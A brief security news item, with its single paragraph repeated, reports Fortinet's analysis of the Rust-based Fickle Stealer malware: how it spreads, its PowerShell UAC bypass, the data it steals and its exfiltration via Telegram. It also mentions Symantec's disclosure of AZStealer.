Insider Risk Management New Rust-based Fickle Malware Uses PowerShell for UAC Bypass and Data Exfiltration
20-June-24
The newly discovered Rust-based information stealer malware, Fickle Stealer, is being disseminated through various methods, including VBA dropper, VBA downloader, link downloader, and executable downloader, with some using PowerShell scripts to bypass User Account Control (UAC) and relay victim information to a Telegram bot. Fortinet FortiGuard Labs noted that the malware, protected by a packer, performs anti-analysis checks before exfiltrating data to a remote server. It targets sensitive information from crypto wallets, browsers like Chrome and Firefox, and applications such as AnyDesk and Discord. It also searches for files with specific extensions and receives a target list from the server for comprehensive data collection. This revelation follows Symantec’s disclosure of AZStealer, an open-source Python stealer that exfiltrates data via Discord webhooks or Gofile, emphasizing the growing threat landscape of information stealers.
The newly discovered Rust-based information stealer malware, Fickle Stealer, is being disseminated through various methods, including VBA dropper, VBA downloader, link downloader, and executable downloader, with some using PowerShell scripts to bypass User Account Control (UAC) and relay victim information to a Telegram bot. Fortinet FortiGuard Labs noted that the malware, protected by a packer, performs anti-analysis checks before exfiltrating data to a remote server. It targets sensitive information from crypto wallets, browsers like Chrome and Firefox, and applications such as AnyDesk and Discord. It also searches for files with specific extensions and receives a target list from the server for comprehensive data collection. This revelation follows Symantec’s disclosure of AZStealer, an open-source Python stealer that exfiltrates data via Discord webhooks or Gofile, emphasizing the growing threat landscape of information stealers.
